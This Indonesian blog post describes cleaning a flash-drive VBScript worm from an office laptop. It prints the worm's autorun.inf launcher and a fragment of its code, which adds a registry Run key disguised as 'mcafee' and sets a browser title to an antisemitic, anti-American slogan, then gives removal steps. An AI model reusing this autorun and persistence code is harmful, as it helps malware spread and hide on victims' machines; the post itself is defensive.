Salah satu notebook di kantor ada yg terserang virus seperti ini. bingung n kenapa bisa kena virus seperti ini. usut punya usut ternyata emang tu laptop di gilir rame rame makanya bisa terkena virus hihihihi…
mari kita memberikan pengobatan kepada si penyakitan.
pertama folder option hide operating system files (recommended) yang terdapat di Tools > Folder Options > Tab View
perhatikan drive di expoler anda ada file autorun.inf dan sfx.dll.vbs, sekarang kita buka file autorun.if nya
[autorun]shellexecute=wscript.exe sfx.dll.vbs
sekarang buka file sfx.dll.vbs
[…]
Set rg = CreateObject(”WScript.Shell”): rg.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\mcafee”,winpath & “\sfx.dll.vbs”: rg.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”, “Bantai Yahudi!!!! Hancurkan Amerika!!! [Bantai Axe gank dan antek2nya!!! SFX harus menang!!!!]”: rg.regwrite “HKCR\vbsfile\DefaultIcon”, “shell32.dll,2″If check <> 1 Then Wscript.sleep 200000Loop While check <> 1: Set sd = CreateObject("Wscript.shell"): sd.run winpath & "\explorer.exe /e,/select, " & Wscript.ScriptFullname
virus ini nyebarnya lewat flashdisk dengan langsung menjalankan autorun.inf dan menjalankan file sfx.dll.vbs Sekarang perhatikan penggalan isi sfx.dll.vbs diatas
lalu cara hilangkan virus ini. sebelum itu matikan proses wscript.exe di taskbar manager (CTRL+ALT+DEL)
hapus file autorun.in dan sfx.dll.vbs dari tiap drive. Dan hapus KEY yang ada di registry karena virus ini membuat registry di “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\mcafee”,winpath & “\sfx.dll.vbs” hapus KEY mcafee”,winpath & “\sfx.dll.vbs”
“HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”, “Bantai Yahudi!!!! Hancurkan Amerika!!! [Bantai Axe gank dan antek2nya!!! SFX harus menang!!!!]”
hapus KEY WindowTitle
Tidak ada komentar:
Posting Komentar